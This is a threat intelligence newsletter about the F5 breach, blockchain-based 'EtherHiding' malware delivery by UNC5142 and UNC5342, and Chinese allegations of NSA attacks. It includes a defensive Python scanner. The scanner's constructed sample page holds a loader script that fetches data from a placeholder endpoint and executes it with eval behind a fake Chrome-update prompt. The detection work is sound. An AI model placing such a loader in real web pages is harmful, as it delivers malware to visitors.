The Signal CW42 2025: F5 Breach, Mandiant Blockchain & China Timekeeping Hack
The Signal CW42 2025
Welcome to The Signal -> your weekly dose of what truly matters in Cyber Threat Intelligence.
Each week I cut through the noise to highlight the key breaches, underground movements, and vulnerability trends shaping the global cyber landscape.
No hype. No buzzwords. Just signal.
F5 Breach: Nation-State Hack Exposes Source Code and Vulnerability Data
F5 Networks is a U.S.-based company specializing in application delivery and security solutions. Its product line, BIG-IP, is widely used by governments and major enterprises to manage network traffic, balance loads, and secure applications at the edge of their infrastructure. Because of its central role in global IT environments, F5 technology is often found in critical network paths of banks, telecom providers, and government agencies.
In August 2025, F5 detected a long-term intrusion by a highly sophisticated nation-state actor, reportedly linked to China (Reuters). The attackers had maintained persistent access to internal systems, including the BIG-IP product development environment and engineering knowledge platforms. During this time, they exfiltrated parts of the BIG-IP source code, internal information about unpatched vulnerabilities, and a small amount of customer configuration data (F5).
The scale of the breach is notable because BIG-IP products are deployed by 48 of the world’s 50 largest corporations. With access to both source code and undisclosed vulnerabilities, the attackers potentially gained valuable insight into how these systems operate, increasing the risk of future exploitation. Although the investigation found no evidence of tampered updates or backdoors, the incident demonstrates how deeply embedded vendors can become prime targets for state-sponsored espionage.
Independent cybersecurity firms, including CrowdStrike, Mandiant, NCC Group, and IOActive, confirmed that no customer-facing or financial systems were affected and that no malicious code was introduced into distributed software. However, government agencies such as CISA and the UK’s NCSC have warned of an imminent threat to organizations using F5 products and issued directives to apply patches and enhance monitoring (Ars Technica). F5 also published a threat-hunting guide to help customers detect suspicious activity.
UNC5142 – EtherHiding as a New Model for Malware Distribution
Since late 2023, Mandiant and Google Threat Intelligence Group (GTIG) have tracked UNC5142, a financially motivated threat actor that pioneered EtherHiding -> the use of blockchain smart contracts to store and deliver malicious code.
UNC5142 compromises vulnerable WordPress websites and injects a JavaScript downloader called CLEARSHORT, an evolution of CLEARFAKE. When a visitor loads an infected site, the script connects to the BNB Smart Chain, fetches encrypted payloads from smart contracts, and displays fake prompts such as Chrome updates or CAPTCHA checks to trick users into running malicious commands.
Over time, the group adopted a three-layer smart contract structure (router, logic, storage) and AES-GCM encryption, making its campaigns highly agile and resilient. The actor also abused Cloudflare Pages to host fake verification pages.
UNC5142’s campaigns delivered various infostealers including VIDAR, LUMMAC.V2, RADTHIEF, and ATOMIC for macOS, using multi-stage loaders (HTA → PowerShell → in-memory execution).
By mid-2025, about 14,000 compromised websites were linked to UNC5142, though no new activity was observed after July 2025, suggesting a tactical pause or shift.
UNC5142 demonstrates how blockchain infrastructure can be repurposed for mass malware distribution -> offering low-cost and decentralized operations that are difficult to take down.
UNC5342 (DPRK) – Nation-State Adoption of EtherHiding
At the same time, GTIG identified UNC5342, a North Korean state-backed group, using the same EtherHiding concept for espionage and cryptocurrency theft.
Since February 2025, UNC5342 has used EtherHiding in its Contagious Interview campaign, where fake recruiters lure software developers with fraudulent job offers. During fake technical tests, victims are asked to download files that deploy the JADESNOW JavaScript downloader, which interacts with BNB Smart Chain and Ethereum to fetch further payloads stored in smart contract data or transaction calldata.
The final payload, INVISIBLEFERRET.JAVASCRIPT, acts as a persistent backdoor and credential stealer targeting browsers, password managers, and crypto wallets.
UNC5342 frequently updates its contracts for less than two dollars per change and switches between blockchain networks to evade detection -> showing how state actors now adapt cybercriminal methods.
This campaign combines financial motives, such as crypto theft, with strategic intelligence collection and shows how decentralized Web3 ecosystems are being abused for persistence and control.
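Both the UNC5142 and UNC5342 sections above describe the same loader pattern: a script on a compromised page reads payload data from a smart contract over a public JSON-RPC endpoint, decodes it and executes it, usually behind a fake update or verification overlay. The following is an added, defender-side example (not code from GTIG, Mandiant or either report): a heuristic scanner that scores crawled HTML/JS from your own web estate for that combination. The indicator names, the weights and the threshold are my assumptions; `eth_call` is the standard Ethereum JSON-RPC read method and 56 is the BNB Smart Chain mainnet chain id. The sample pages are constructed for the example, and the contract addresses in them are obvious placeholders.

```python
"""Heuristic triage of crawled pages for EtherHiding-style loaders (added example)."""
import re
from dataclasses import dataclass, field

# Each indicator is a regex run over the raw page body. None is conclusive on its
# own (a legitimate dapp front-end also calls eth_call); the combination is what
# matters, hence the score threshold below. Indicator names are my own labels.
INDICATORS = {
    # JSON-RPC read of contract state, as JSON ("method":"eth_call") or as a JS object key
    "json_rpc_read":    re.compile(r'["\']?method["\']?\s*:\s*["\']eth_call["\']'),
    # explicit BNB Smart Chain mainnet chain id (56 / 0x38)
    "bsc_chain_id":     re.compile(r'\bchainId\b\s*[:=]\s*(?:0x38|56)\b'),
    # a 20-byte EVM address literal (contract the loader reads from)
    "contract_address": re.compile(r'0x[0-9a-fA-F]{40}\b'),
    # dynamic execution of fetched/decoded data
    "dynamic_exec":     re.compile(r'\b(?:eval|Function)\s*\(|\batob\s*\('),
    # social-engineering overlay text of the kind described in the report
    "fake_prompt_text": re.compile(r'update\s+(?:your\s+)?chrome|verify\s+you\s+are\s+human', re.I),
}

SUSPICIOUS_THRESHOLD = 3  # assumption: three or more indicators on one page -> review it


@dataclass
class ScanResult:
    url: str
    hits: list = field(default_factory=list)

    @property
    def score(self) -> int:
        return len(self.hits)

    @property
    def suspicious(self) -> bool:
        return self.score >= SUSPICIOUS_THRESHOLD


def scan_page(url: str, body: str) -> ScanResult:
    """Return which indicators fire on a single page body."""
    result = ScanResult(url)
    for name, pattern in INDICATORS.items():
        if pattern.search(body):
            result.hits.append(name)
    return result


def triage(pages: dict) -> list:
    """Scan {url: body} and return the suspicious results, highest score first."""
    results = [scan_page(url, body) for url, body in pages.items()]
    return sorted((r for r in results if r.suspicious), key=lambda r: -r.score)


# --- constructed samples (not real captures) ------------------------------------

# Shape of an injected loader: contract read over JSON-RPC, decode, execute, fake overlay.
SUSPICIOUS_PAGE = """<html><body>
<script>
const rpc = "https://RPC-ENDPOINT-PLACEHOLDER/";   // placeholder, not a real endpoint
const contract = "0x0000000000000000000000000000000000000000";  // placeholder address
fetch(rpc, {method: "POST", body: JSON.stringify(
  {"jsonrpc": "2.0", "method": "eth_call", "params": [{"to": contract, "data": "0x"}, "latest"], "id": 1})})
  .then(r => r.json()).then(j => eval(atob(j.result)));
</script>
<div class="overlay">Update your Chrome to continue</div>
</body></html>"""

# A legitimate dapp front-end also reads contract state, but without decode-and-execute
# or a fake prompt, so it stays below the threshold.
BENIGN_DAPP_PAGE = """<html><body>
<script>
const contract = "0x1111111111111111111111111111111111111111";  // placeholder address
window.ethereum.request({method: "eth_call", params: [{to: contract, data: "0x"}, "latest"]});
</script>
</body></html>"""

PLAIN_PAGE = "<html><body><p>Hello world</p></body></html>"

if __name__ == "__main__":
    crawl = {
        "https://example.invalid/blog": SUSPICIOUS_PAGE,
        "https://example.invalid/dapp": BENIGN_DAPP_PAGE,
        "https://example.invalid/": PLAIN_PAGE,
    }
    for r in triage(crawl):
        print(f"{r.url}: score={r.score} hits={r.hits}")
```

Run it over the output of a crawl of your own sites (or over the inline scripts a WordPress integrity check reports as changed); hits on `dynamic_exec` together with `json_rpc_read` are the pair worth looking at first, since that is the read-then-execute step the loader cannot do without.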
Takeaway
- UNC5142 created and refined EtherHiding as a crimeware technique for large-scale malware delivery.
- UNC5342, a state-sponsored actor, later adopted and improved the same method for targeted espionage and financial gain.
- Both reports were published on October 16th, 2025 by GTIG.
China Accuses US NSA of Cyberattacks on National Time Service Center
China’s Ministry of State Security (MSS) has accused the US National Security Agency (NSA) of carrying out a long-term cyberattack campaign against the National Time Service Center in Xi’an -> a key institution under the Chinese Academy of Sciences responsible for maintaining and broadcasting China’s official time (Bloomberg).
According to the MSS, the NSA exploited vulnerabilities in foreign-brand smartphones used by center employees as early as March 2022 to steal sensitive data and later used stolen login credentials to infiltrate internal systems (Reuters).
Between August 2023 and June 2024, the NSA allegedly deployed 42 advanced cyber tools and “state-level cyberespionage weapons” targeting multiple internal networks, including China’s high-precision ground-based timing infrastructure (SCMP), (AP).
The MSS said the operations were highly covert and launched mainly during nighttime hours in Beijing, using virtual private servers in the United States, Europe, and Asia to disguise their origin (Global Times).
Chinese cybersecurity experts warned that successful interference with the national time system could have triggered cascading effects across critical sectors such as communications, finance, power distribution, and satellite navigation. Even millisecond deviations in timing, they said, could disrupt financial markets or cause power grid failures (SCMP).
Authorities stated that the MSS had guided the center to cut off attack chains and enhance defensive measures. Investigations also traced the NSA’s use of encrypted communication channels, forged digital certificates, and obfuscation techniques to evade detection (Global Times).
The NSA and the US Embassy in Beijing have not issued any official response to the allegations (Bloomberg), (Reuters).
Beijing framed the incident as another example of Washington’s “cyber hegemony” and violation of international norms in cyberspace (Global Times).
The accusations mark the latest escalation in the ongoing cyber and geopolitical rivalry between China and the United States, coming amid renewed trade tensions and mutual claims of state-sponsored hacking campaigns (Reuters), (SCMP).